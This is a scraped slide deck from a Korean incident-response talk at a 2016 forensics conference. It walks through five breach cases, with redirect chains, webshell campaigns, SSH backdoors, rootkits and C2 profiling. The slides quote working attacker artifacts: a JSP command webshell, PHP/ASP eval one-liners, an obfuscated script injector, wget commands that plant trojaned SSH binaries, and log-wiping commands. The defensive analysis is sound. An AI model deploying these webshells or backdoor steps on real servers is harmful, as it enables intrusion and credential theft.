[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start
[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start
[2007 CodeEngn Conference 01] 이강석 - Malware Analysis StartGangSeok Lee
 

Similar to (Ficon2016) #2 침해사고 대응, 이렇다고 전해라 (20)

(130511) #fitalk utilization of ioc, ioaf and sig base
(130511) #fitalk   utilization of ioc, ioaf and sig base(130511) #fitalk   utilization of ioc, ioaf and sig base
(130511) #fitalk utilization of ioc, ioaf and sig base
 
(130216) #fitalk reverse connection tool analysis
(130216) #fitalk   reverse connection tool analysis(130216) #fitalk   reverse connection tool analysis
(130216) #fitalk reverse connection tool analysis
 
악성코드와 분석 방안
악성코드와 분석 방안악성코드와 분석 방안
악성코드와 분석 방안
 
악성코드와 분석 방안
악성코드와 분석 방안악성코드와 분석 방안
악성코드와 분석 방안
 
(130608) #fitalk trends in d forensics (may, 2013)
(130608) #fitalk   trends in d forensics (may, 2013)(130608) #fitalk   trends in d forensics (may, 2013)
(130608) #fitalk trends in d forensics (may, 2013)
 
(140407) #fitalk d trace를 이용한 악성코드 동적 분석
(140407) #fitalk   d trace를 이용한 악성코드 동적 분석(140407) #fitalk   d trace를 이용한 악성코드 동적 분석
(140407) #fitalk d trace를 이용한 악성코드 동적 분석
 
지능형지속위협공격 최신동향 분석
지능형지속위협공격 최신동향 분석지능형지속위협공격 최신동향 분석
지능형지속위협공격 최신동향 분석
 
2.악성코드와 분석 방안
2.악성코드와 분석 방안2.악성코드와 분석 방안
2.악성코드와 분석 방안
 
20171212 [ai times] 'ai' 인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...
20171212 [ai times] 'ai'   인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...20171212 [ai times] 'ai'   인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...
20171212 [ai times] 'ai' 인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...
 
보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법
 
(Fios#02) 1. 랜섬웨어 연대기
(Fios#02) 1. 랜섬웨어 연대기(Fios#02) 1. 랜섬웨어 연대기
(Fios#02) 1. 랜섬웨어 연대기
 
안드로이드 악성코드의 철학적_연구_padocon_조효제
안드로이드 악성코드의 철학적_연구_padocon_조효제안드로이드 악성코드의 철학적_연구_padocon_조효제
안드로이드 악성코드의 철학적_연구_padocon_조효제
 
악성코드 분석 도구
악성코드 분석 도구악성코드 분석 도구
악성코드 분석 도구
 
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
 
악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)
악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)
악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)
 
16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석
 
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.316.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3
 
[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start
[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start
[2007 CodeEngn Conference 01] 이강석 - Malware Analysis Start
 

More from INSIGHT FORENSIC

(150124) #fitalk advanced $usn jrnl forensics (english)
(150124) #fitalk   advanced $usn jrnl forensics (english)(150124) #fitalk   advanced $usn jrnl forensics (english)
(150124) #fitalk advanced $usn jrnl forensics (english)INSIGHT FORENSIC
 
(140118) #fitalk detection of anti-forensics artifacts using ioa fs
(140118) #fitalk   detection of anti-forensics artifacts using ioa fs(140118) #fitalk   detection of anti-forensics artifacts using ioa fs
(140118) #fitalk detection of anti-forensics artifacts using ioa fsINSIGHT FORENSIC
 
(140118) #fitalk 2013 e-discovery trend
(140118) #fitalk   2013 e-discovery trend(140118) #fitalk   2013 e-discovery trend
(140118) #fitalk 2013 e-discovery trendINSIGHT FORENSIC
 
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk   plaso 슈퍼 타임라인 분석 도구 활용 방안(141031) #fitalk   plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안INSIGHT FORENSIC
 
(141031) #fitalk os x yosemite artifacts
(141031) #fitalk   os x yosemite artifacts(141031) #fitalk   os x yosemite artifacts
(141031) #fitalk os x yosemite artifactsINSIGHT FORENSIC
 
(140716) #fitalk 전자금융사고에서의 디지털 포렌식
(140716) #fitalk   전자금융사고에서의 디지털 포렌식(140716) #fitalk   전자금융사고에서의 디지털 포렌식
(140716) #fitalk 전자금융사고에서의 디지털 포렌식INSIGHT FORENSIC
 
(140716) #fitalk digital evidence from android-based smartwatch
(140716) #fitalk   digital evidence from android-based smartwatch(140716) #fitalk   digital evidence from android-based smartwatch
(140716) #fitalk digital evidence from android-based smartwatchINSIGHT FORENSIC
 
(140625) #fitalk sq lite 소개와 구조 분석
(140625) #fitalk   sq lite 소개와 구조 분석(140625) #fitalk   sq lite 소개와 구조 분석
(140625) #fitalk sq lite 소개와 구조 분석INSIGHT FORENSIC
 
(140625) #fitalk sq lite 삭제된 레코드 복구 기법
(140625) #fitalk   sq lite 삭제된 레코드 복구 기법(140625) #fitalk   sq lite 삭제된 레코드 복구 기법
(140625) #fitalk sq lite 삭제된 레코드 복구 기법INSIGHT FORENSIC
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur lsINSIGHT FORENSIC
 
(130202) #fitalk trends in d forensics (jan, 2013)
(130202) #fitalk   trends in d forensics (jan, 2013)(130202) #fitalk   trends in d forensics (jan, 2013)
(130202) #fitalk trends in d forensics (jan, 2013)INSIGHT FORENSIC
 
(130202) #fitalk china threat
(130202) #fitalk   china threat(130202) #fitalk   china threat
(130202) #fitalk china threatINSIGHT FORENSIC
 
(130119) #fitalk sql server forensics
(130119) #fitalk   sql server forensics(130119) #fitalk   sql server forensics
(130119) #fitalk sql server forensicsINSIGHT FORENSIC
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk   apt, cyber espionage threat(130119) #fitalk   apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
(130119) #fitalk all about physical data recovery
(130119) #fitalk   all about physical data recovery(130119) #fitalk   all about physical data recovery
(130119) #fitalk all about physical data recoveryINSIGHT FORENSIC
 
(130105) #fitalk trends in d forensics (dec, 2012)
(130105) #fitalk   trends in d forensics (dec, 2012)(130105) #fitalk   trends in d forensics (dec, 2012)
(130105) #fitalk trends in d forensics (dec, 2012)INSIGHT FORENSIC
 
(130105) #fitalk criminal civil judicial procedure in korea
(130105) #fitalk   criminal civil judicial procedure in korea(130105) #fitalk   criminal civil judicial procedure in korea
(130105) #fitalk criminal civil judicial procedure in koreaINSIGHT FORENSIC
 
(131116) #fitalk extracting user typing history on bash in mac os x memory
(131116) #fitalk   extracting user typing history on bash in mac os x memory(131116) #fitalk   extracting user typing history on bash in mac os x memory
(131116) #fitalk extracting user typing history on bash in mac os x memoryINSIGHT FORENSIC
 
(131102) #fitalk get windows logon password in memory dump
(131102) #fitalk   get windows logon password in memory dump(131102) #fitalk   get windows logon password in memory dump
(131102) #fitalk get windows logon password in memory dumpINSIGHT FORENSIC
 
(130928) #fitalk cloud storage forensics - dropbox
(130928) #fitalk   cloud storage forensics - dropbox(130928) #fitalk   cloud storage forensics - dropbox
(130928) #fitalk cloud storage forensics - dropboxINSIGHT FORENSIC
 

More from INSIGHT FORENSIC (20)

(150124) #fitalk advanced $usn jrnl forensics (english)
(150124) #fitalk   advanced $usn jrnl forensics (english)(150124) #fitalk   advanced $usn jrnl forensics (english)
(150124) #fitalk advanced $usn jrnl forensics (english)
 
(140118) #fitalk detection of anti-forensics artifacts using ioa fs
(140118) #fitalk   detection of anti-forensics artifacts using ioa fs(140118) #fitalk   detection of anti-forensics artifacts using ioa fs
(140118) #fitalk detection of anti-forensics artifacts using ioa fs
 
(140118) #fitalk 2013 e-discovery trend
(140118) #fitalk   2013 e-discovery trend(140118) #fitalk   2013 e-discovery trend
(140118) #fitalk 2013 e-discovery trend
 
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk   plaso 슈퍼 타임라인 분석 도구 활용 방안(141031) #fitalk   plaso 슈퍼 타임라인 분석 도구 활용 방안
(141031) #fitalk plaso 슈퍼 타임라인 분석 도구 활용 방안
 
(141031) #fitalk os x yosemite artifacts
(141031) #fitalk   os x yosemite artifacts(141031) #fitalk   os x yosemite artifacts
(141031) #fitalk os x yosemite artifacts
 
(140716) #fitalk 전자금융사고에서의 디지털 포렌식
(140716) #fitalk   전자금융사고에서의 디지털 포렌식(140716) #fitalk   전자금융사고에서의 디지털 포렌식
(140716) #fitalk 전자금융사고에서의 디지털 포렌식
 
(140716) #fitalk digital evidence from android-based smartwatch
(140716) #fitalk   digital evidence from android-based smartwatch(140716) #fitalk   digital evidence from android-based smartwatch
(140716) #fitalk digital evidence from android-based smartwatch
 
(140625) #fitalk sq lite 소개와 구조 분석
(140625) #fitalk   sq lite 소개와 구조 분석(140625) #fitalk   sq lite 소개와 구조 분석
(140625) #fitalk sq lite 소개와 구조 분석
 
(140625) #fitalk sq lite 삭제된 레코드 복구 기법
(140625) #fitalk   sq lite 삭제된 레코드 복구 기법(140625) #fitalk   sq lite 삭제된 레코드 복구 기법
(140625) #fitalk sq lite 삭제된 레코드 복구 기법
 
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk   potentially malicious ur ls(130216) #fitalk   potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
 
(130202) #fitalk trends in d forensics (jan, 2013)
(130202) #fitalk   trends in d forensics (jan, 2013)(130202) #fitalk   trends in d forensics (jan, 2013)
(130202) #fitalk trends in d forensics (jan, 2013)
 
(130202) #fitalk china threat
(130202) #fitalk   china threat(130202) #fitalk   china threat
(130202) #fitalk china threat
 
(130119) #fitalk sql server forensics
(130119) #fitalk   sql server forensics(130119) #fitalk   sql server forensics
(130119) #fitalk sql server forensics
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk   apt, cyber espionage threat(130119) #fitalk   apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
 
(130119) #fitalk all about physical data recovery
(130119) #fitalk   all about physical data recovery(130119) #fitalk   all about physical data recovery
(130119) #fitalk all about physical data recovery
 
(130105) #fitalk trends in d forensics (dec, 2012)
(130105) #fitalk   trends in d forensics (dec, 2012)(130105) #fitalk   trends in d forensics (dec, 2012)
(130105) #fitalk trends in d forensics (dec, 2012)
 
(130105) #fitalk criminal civil judicial procedure in korea
(130105) #fitalk   criminal civil judicial procedure in korea(130105) #fitalk   criminal civil judicial procedure in korea
(130105) #fitalk criminal civil judicial procedure in korea
 
(131116) #fitalk extracting user typing history on bash in mac os x memory
(131116) #fitalk   extracting user typing history on bash in mac os x memory(131116) #fitalk   extracting user typing history on bash in mac os x memory
(131116) #fitalk extracting user typing history on bash in mac os x memory
 
(131102) #fitalk get windows logon password in memory dump
(131102) #fitalk   get windows logon password in memory dump(131102) #fitalk   get windows logon password in memory dump
(131102) #fitalk get windows logon password in memory dump
 
(130928) #fitalk cloud storage forensics - dropbox
(130928) #fitalk   cloud storage forensics - dropbox(130928) #fitalk   cloud storage forensics - dropbox
(130928) #fitalk cloud storage forensics - dropbox
 

(Ficon2016) #2 침해사고 대응, 이렇다고 전해라

  • 1. 침해사고 대응 ‘16.4.22 KISA 분석1팀 이재광 침해사고 분석 대응, EnCE/CISA/ISMS/CPPG F-INSIGHT CONFERENCE 2016 이렇다고 전해라~
  • 2. 대응 체계 꺼리 Case 분석 • 초기 대응(시야 확보) • 대응전략 수립(관찰의 힘) • 상세 분석(예외 No, Profiling) • 사후 조치(Collabo) Think... Episode
  • 3. 대응 체계  피해시스템 분석을 위하여 다양한 분석 도구 및 장비 사용 - 디스크 이미지 복제 : Rapid Image, Magic Cube - 전문 분석 도구 : Encase 7, FTK, F-EXPLORER
  • 5. 시야가 확보되면 문제를 풀 수 있다 서버 설정 DNS 설정 변경 스크립트 삽입 호스트 파일 변조 불법 리다이렉트 Keyword1st Case
  • 8. 180.131.1.79(koreaboxoffice.com / 브리즈피엔엠) -> rafomedia.com(158.85.62.205) -> adrotate.se(83.140.162.230) -> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) -> aff.camplace.com 불법 리다이렉트1st Case 시야확보
  • 12. 180.x.x.79(korOOOice.com) -> rafomedia.com(158.85.62.205) -> adrotate.se(83.140.162.230) -> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) -> aff.camplace.com 불법 리다이렉트1st Case 시야확보
  • 13. 시야가 확보되면 문제를 풀 수 있다 삽질 하자는 뜻인 줄 알았다. 시야를 확보하자는 뜻이었다 Episode
  • 14. 2nd Case 대응전략 수립 관찰은 쓰다. 그러나 열매는 달다
  • 15. 웹셸 제거 계정 접근 제어 설정 서버 점검 서비스 재설치 서비스 망 해킹 2nd Case Keyword
  • 16. 117.x.x.188(한국, VPN) 211. x.x.19(한국, VPN) 211. x.x.3(한국, VPN) 211. x.x.203(한국) 210.x.x.22(한국) 116.x.x.1~116.x.x.255(중국) 웹서버(213) hoxxy.OOO.com 웹서버(222) www.OOO.com 파일서버(209) file.OOO.com 파일서버(223) hoxxdata.OOO.com 211.x47.x0.51(KR) 공유폴더 접속(관리자 계정) 웹셸 업로드 FTP 접속(관리자 계정) 웹셸 업로드 DB서버(210) 211.x34.x2.202(KR) 원격제어 OO닷컴 서버망 58.x.162.x win 서버 13대 linux 서버 ??대 2nd Case 서비스 망 해킹 관찰의 힘
  • 17. <213번 웹서> D:OnmamWebSiteSourcehomxx.OOO.com/common/js/prototype.js <222번 웹서버> D:OnmamWebSiteSourceimages.OOO.comCommon_jsYUtil.js myOOO.co.kr/test/f/ck.gif eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)] =k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(ne w RegExp('b'+e(c)+'b','g'),k[c])}}return p}('4.3("<0 2=1://5.b.6.a/9/8.7></0>");',12,12,'script|http|src|write|d ocument|itoy|co|gif|all|images|kr|dbros'.split('|'),0,{})) --> 디코딩 결과 document.write("<script src=http://itoy.dbOOO.co.kr/images/all.gif></script>"); 2015-04-20 17:16:17 W3SVC678852465 58.x.x.213 POST /customer/con.asp(웹셸) - 80 – 117.x.x.188(한국, VPN) Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2;+Trident/4.0;+qdesk+2.4.1264.203;+.NET+CLR+1.1.4322;+.N ET+CLR+2.0.50727;+.NET+CLR+3.0.04506.30;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) 200 0 0 2nd Case 서비스 망 해킹 관찰의 힘
  • 18. 일부 웹셸의 경우 IIS의 가상폴더를 이용하여 연결 2nd Case 서비스 망 해킹 관찰의 힘
  • 19. 웹셸이 삭제될 경우 공유폴더 접근을 통해 다시 업로드 2nd Case 서비스 망 해킹 관찰의 힘
  • 20. 공유폴더 접근 차단 조치 후 209번 서버에서 222번 서버로 FTP 접속, 다시 웹셸 업로드 2nd Case 서비스 망 해킹 관찰의 힘
  • 21. 209번 서버 확인결과, 외부 C&C로 백커넥트되어 있는 상태 2nd Case 서비스 망 해킹 관찰의 힘
  • 22. 사용자 행위 확인결과 공격도구인 Cain.exe 실행이력 확인 Cain.exe 실행 시점의 브라우저 기록을 확인한 결과 다수의 악성코드 추가다운 수행한 이력 확인 isangwhang.com/data/goodsimages/fxp.exe <시점 : 2015-04-28 18:40:58> ischoolplus.com/css/zx.exe <시점 : 2015-04-28 23:07:31> isangwhang.com/data/goodsimages/cain.exe <시점 : 2015-04-28 23:15:37> 209번 파일서버 브라우져 로그 확인 - 공격자가 추가 악성코드 다운을 시도 2nd Case 서비스 망 해킹 관찰의 힘
  • 23. 악성코드를 추가 다운한 시점의 이벤트로그 확인 - 223번 서버에서 209번 서버로 원격터미널 접속 223번 파일서버 : 209과 동일한 원격제어 악성코드가 설치, 외부 C&C로 백커넥트 연결 ※ 악성코드 명 : lss.jpg(해킹도구인 HTran 악성코드) ※ C&C : 211.x.x.202:443(한국) 2nd Case 서비스 망 해킹 관찰의 힘
  • 24. C2로 악용된 서버 추가 분석 - 211.x47.x0.51(OO닷컴 DB서버) 2nd Case 서비스 망 해킹 관찰의 힘
  • 25. 2nd Case 서비스 망 해킹 관찰의 힘
  • 26. 2nd Case 서비스 망 해킹 관찰의 힘
  • 27. 관찰은 쓰다. 그러나 열매는 달다 감동보다 큰 설득은 없다 Episode
  • 28. 3rd Case 상세 분석 충분히 대화하라, 예외를 두지 말라
  • 29. 관리자 PC 보안관리 개발 어플리케이션 보안 정기 점검 접근제어 개발 망 해킹 로그관리 3rd Case Keyword
  • 30. 3rd Case 개발 망 해킹 예외는 없다
  • 31. 3rd Case 메모리상에서 동작중인 DDoS 악성코드 예외는 없다개발 망 해킹
  • 32. 3rd Case 2013-07-10 10:23:10,134 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099, rmiPort=1098, backlog=50, bindAddress=/0.0.0.0, 2013-07-10 10:23:14,293 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL service available at : /0.0.0.0:8093 ......(중략) 2015-07-30 15:48:09,072 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099, rmiPort=1098, backlog=50, bindAddress=/0.0.0.0, 2015-07-30 15:48:12,589 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL service available at : /0.0.0.0:8093 예외는 없다개발 망 해킹
  • 33. 3rd Case 2013-09-21 06:50:54,798 INFO [org.jboss.web.tomcat.tc5.TomcatDeployer] deploy, //업로드 ctxPath=/webconsole, //파일명 warUrl=file:/usr/local/jboss/server/default/deploy/management/webconsole.war/ //경로 예외는 없다개발 망 해킹
  • 34. 3rd Case <%@page import="java.io.*"%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Execute"></FORM><PRE><%if (request.getParameter("cmd") != null) {out.println("Command:" + request.getParameter("cmd")); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new DataInputStream(in);String disr = dis.readLine(); while ( disr != null ) { out.println(disr);disr = dis.readLine();}}%></BODY></HTML></pre> 개발 망 해킹 예외는 없다
  • 35. 3rd Case 해당 Jboss 기능과 웹셸을 이용하여 악성 파일 생성 및 실행 웹셸 5개, 다운로더 58개, 백도어 1종, IRC bot 1종, DDoS 공격 악성코드 1종 생성 DDoS 악성코드 실행 시 생성되는 설정 파일 시간 값 예외는 없다개발 망 해킹
  • 37. 3rd Case /tmp/.1/ 경로에 설치된 [energy mech 2.8] IRC bot http://www.energymech.net/index.html 예외는 없다개발 망 해킹
  • 38. 3rd Case 예외는 없다개발 망 해킹
  • 39. 관찰은 쓰다. 그러나 열매는 달다 우리의 대화는 목적이 서로 다르다 Episode
  • 40. 4th Case Profiling 소통하여 인텔리를 활용하라
  • 41. 거점 확보 기법 내부 확산 기법 C2 운영 기법 웹셸 운영 기법 공격 기법 코드 유포 기법 타깃 식별 기법 4th Case Keyword
  • 42. cd /tmp/xxx/temp/; wget http://www.OOO.com/xxx/aa.gif wget http://www.OOO.com/xxx/bb.gif wget http://www.OOO.com/xxx/cc.gif mv aa.gif sshd; mv bb.gif ssh; mv cc.gif scp; chmod 755 sshd ssh scp;ls –al cd /usr/sbin/; mv sshd sshd.bak; cd /usr/bin/; mv scp scp.bak; mv ssh ssh.bak cd /tmp/xxx/temp/; cp sshd /usr/sbin/sshd; cp ssh /usr/bin/ssh; cp scp /usr/bin/scp /etc/init.d/sshd restart ssh 127.0.0.1 cd /usr/bin/; touch –r scp.bak scp ssh; rm –f *.bak; ls –al scp ssh cd /usr/sbin/; touch –r sshd.bak sshd; rm –f sshd.bak; ls –al sshd 4th Case 거점 확보 기법 Profiling SSH 백도어
  • 43. [root@ksxxxx backup_virus]# strings /usr/sbin/sshd | more Bad options in %.100s file, line %lu: %.50s KiTrap0DExp!!! --> 공격자가 원격으로 로그인하기 위해 사용하는 비밀번호 /usr/share/ssh//slog --> 관리자의 계정을 로깅하는 키로깅 파일 %s:%s --> 키로깅 형태 trying public RSA key file %s auth-rsa.c [root@ksxxxx- ssh]# cat slog | tail www:prin**** www:prince4025 root:rlawl**** root:wwlas**** root:eel!**** root:lliet**** 4th Case 거점 확보 기법 Profiling SSH 백도어
  • 44. 4th Case 거점 확보 기법 Profiling SSH 백도어
  • 45. usb-spi.ko 파일은 TCP 통신 트래픽 중 ‘fuck@root’ 문자열이 포 함된 패킷을 수신하면 /var/lib/nfs/statd/dm/libijs.so 실행 루트킷 파일 /lib/modules/2.6.18-404.el5/kernel/sound/usb/usb-spi.ko /var/lib/nfs/statd/dm/libijs.so /var/lib/nfs/statd/dm/libijs2.so libijs.so 파일은 공격자가 설정한 IP주소로 리버스 텔넷 시도 4th Case 거점 확보 기법 Profiling 루트킷
  • 46. /proc 폴더 분석을 통한 숨겨진 프로세스 탐지 기법 cmdline : 명령행 매개변수 cwd : 현재 작업 디렉토리 maps : 실행 파일과 라이브러리에 대한 메모리 맵 mem : 프로세스 메모리 status : 프로세스 상태 environ : 프로세스에 공개된 환경변수 exe : 프로세스의 실행파일 fd : 프로세스가 열어놓은 파일 목록 root : 프로세스 루트 디렉토리 4th Case 거점 확보 기법 Profiling 루트킷
  • 47. /proc 폴더 분석을 통한 숨겨진 프로세스 탐지 기법 for PID in $(./chkproc -v | grep "PID" | grep "/" | awk -F "(" '{print $1}' | awk '{print $2}'); do echo -n "PID[$PID]"; ls -al /proc/$PID |grep exe |awk '{print "exe -> "$11}'; done 4th Case 거점 확보 기법 Profiling 루트킷
  • 48. /proc 폴더 분석을 통한 숨겨진 프로세스 탐지 기법 for PID in $(find ./ -name exe | grep -v task | awk -F "/" '{print $2}'); do echo -n "PID[$PID]"; ls -al /proc/$PID | grep exe |awk '{print "exe -> "$11}';done 4th Case 거점 확보 기법 Profiling 루트킷
  • 49. /usr/bin/umount –l root –p 22 –z dkagh#@!220.x.x.25 “cd /root/; mv .bash_history .bash_history.bak; ls-al” /usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.25 “cd /var/log/; mv wtmp wtmp.bak; mv lastlog lastlog.bak; mv secure secure.bak; ls –al *.bak” /usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.25 “/etc/init.d/iptables stop” /usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.28 … /usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.29 … /usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.35 … /usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.36 4th Case 내부 확산 기법 Profiling
  • 50. 국내 소프트웨어 업체 인증서로 서명된 악성코드 4th Case 타깃 식별 기법 Profiling
  • 51. 4th Case 타깃 식별 기법 Profiling
  • 53. 4th Case C2 운영 기법 Profiling
  • 54. 4th Case C2 운영 기법 Profiling
  • 55. 4th Case C2 운영 기법 Profiling
  • 56. 4th Case C2 운영 기법 Profiling
  • 57. C&C에서 추출된 DB -1 4th Case C2 운영 기법 Profiling
  • 58. 4th Case 코드 유포 기법 Profiling
  • 59. <%eval request("*0#")%> <?php eval($_POST[ad]);?> <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"""mFpECU"""&")"&")")%> <?php preg_replace("//e",str_replace('%','v'.'a','e'.'%'.'l($_R'.'E'.'Q'.'U'.'E'.'S'.'T'.'[s'.'m'.'s'.'])'),"");?> <?php eval($_POST[cmd]);?><?ob_start();?><?ob_start();?> <?ob_start();?> 4th Case 웹셸 운영 기법 Profiling
  • 60. 4th Case 웹셸 운영 기법 Profiling
  • 61. 웹 소스 경로에서 웹셸 검사 ?? 웹 로그 기반 침해사고 대응 ?? 4th Case 웹셸 운영 기법 Profiling
  • 62. 4th Case 웹셸 운영 기법 Profiling
  • 63. 윈도우 API로 접근 4th Case 웹셸 운영 기법 Profiling 웹으로 접근
  • 64. 4th Case 웹셸 운영 기법 Profiling
  • 65. 4th Case 웹셸 운영 기법 Profiling
  • 66. 관찰은 쓰다. 그러나 열매는 달다 가치있는 정보의 차이가 진짜 차이다 Episode
  • 67. 5th Case 사후 조치 Cooperation ⇒ Collaboration
  • 68. 관리자 관심 Web 내부망 전파 커뮤니티 DB 유출 관리자 보호 거점, 로그 취약한 호스팅 스피어 피싱 5th Case Keyword 로그 거점
  • 69. 5th Case Scrum vs Kanban.hwp 61.x.x.251 port : 443 (C&C, ) 122.x.x.214 port : 443 (C&C) 15년도 추계학술대회 안내문.hwp 203.x.x.163 port : 443,8443 (C&C) 196.x.x.106 port : 443, 8443 (C&C) 관리자 공격 Collabo
  • 70. 5th Case 관리자 공격 Collabo
  • 71. 5th Case 관리자 공격 Collabo
  • 72. 5th Case ① 해킹된 웹사이트 조치 과정에서 악성코드 감염 ② 원격제어권 확보 ③ 관리자 PC의 관리프로그램을 통한 RAT 설치 ④ 다수 웹서버에 대한 추가 원격제어권 확보 관리자 공격 취약한 웹에서 사용되는 ActiveX 취약점을 공격에 악용 대기… 대기... 대기… Collabo
  • 73. 5th Case 관리자 공격 [root@exxx bin]# stat /lib/libcom.so.3.0.1 File: `/lib/libcom.so.3.0.1' Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) 리눅스 preload (/etc/ld.so.preload) - 모든 프로세스에 so 파일 인젝션 Collabo
  • 75. 디도스 공격 C2 ’15.4.25 27.x55.78.x 금융정보유출 ’15.7.7 APT C2 사용자 zhongwei wang 26815139@qq.com 27.x55.84.x ’15.1.22 27.x55.67.x 디도스 & 원격제어 C2 ’14.12.10 27.x55.71.x 5th Case 주요 거점 Collabo
  • 76. 76 8 16 0 10 20 30 40 50 60 70 80 1개월~3개월 4개월~6개월 6개월~1년 최초 침투에서 악성코드 유포까지 소요된 기간 비율 시스템 상세 분석이 진행된 사고(50여건) 기준 5th Case Log... Collabo
  • 77. 관찰은 쓰다. 그러나 열매는 달다 내가 해봐야 하는 것은 보안 내재화다 Episode
  • 78.  명확하고 신속한 의사소통(분석가, 피해기관, 유관기관)  다양한 로그 분석을 통한 신중한 결과 도출(유관기관과의 정보공유)  분석 결과 기반 추가 증거 수집  이미지 및 방화벽로그/DB로그/해킹도구 등 다양한 분석 경험  전체적인 분석방향 및 일정 조율  상세한 리포트 거의 끝. Think... NOPASIM
  • 79.  공격대상 기관의 특성에 따라 침투 경로 및 기법 상이  보안 체계 자체의 Risk  최초 침투경로 확인 방안 / 전사적 보안 점검 방안  로그관리의 표준화  네트워크 기반 이상행위 탐지 체계  Defensive Security의 활성 거의 끝. Think... NOPASIM